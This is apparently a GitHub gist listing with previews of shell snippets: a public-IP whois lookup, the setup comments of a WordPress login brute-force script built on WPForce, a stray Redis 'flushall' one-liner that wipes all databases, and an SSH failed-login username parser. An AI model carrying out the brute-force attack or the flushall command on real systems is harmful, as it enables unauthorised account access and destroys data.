Skip to content

Instantly share code, notes, and snippets.

View avilum's full-sized avatar
💭
https://ports.sh/

Avi Lumelsky avilum

💭
https://ports.sh/
View GitHub Profile
@avilum
avilum / whoami.sh
Created July 4, 2021 12:07
Who Am I ? (Whois on my public IP - ISP level)
wget -qO- "http://ipwhois.app/json/$(wget -qO- http://checkip.amazonaws.com)"
# Optionally - pipe the JSON output to jq:
# wget -qO- "http://ipwhois.app/json/$(wget -qO- http://checkip.amazonaws.com)" | jq
@avilum
avilum / bruteforce_wordpress_users.sh
Last active October 30, 2025 10:14
Bruteforce Wordpress Website Using WP-JSON Users API, With 1000 With Top Common Passwords
#
# This file can be saved as 'bruteforce_wordpress_users.sh'
#
# Requirements:
# - python2 (with requests)
# - jq
# - wget
# - WPForce
# 1. Cloning WPForce:
# git clone https://github.com/n00py/WPForce.git && cd ./WPForce
python -c 'import redis; print(redis.Redis().flushall())'
@avilum
avilum / invalid_ssh_logins_usernames.sh
Created March 9, 2020 09:11
Print the names of the users that failed to connect to a machine using ssh
cat /var/log/auth.log | grep -i -e "disconnected from invalid user" | awk -F' ' '{print $10}' | sort | uniq # INVALID LOGINS USERNAMES (for bash autocompletion and reverse-i search)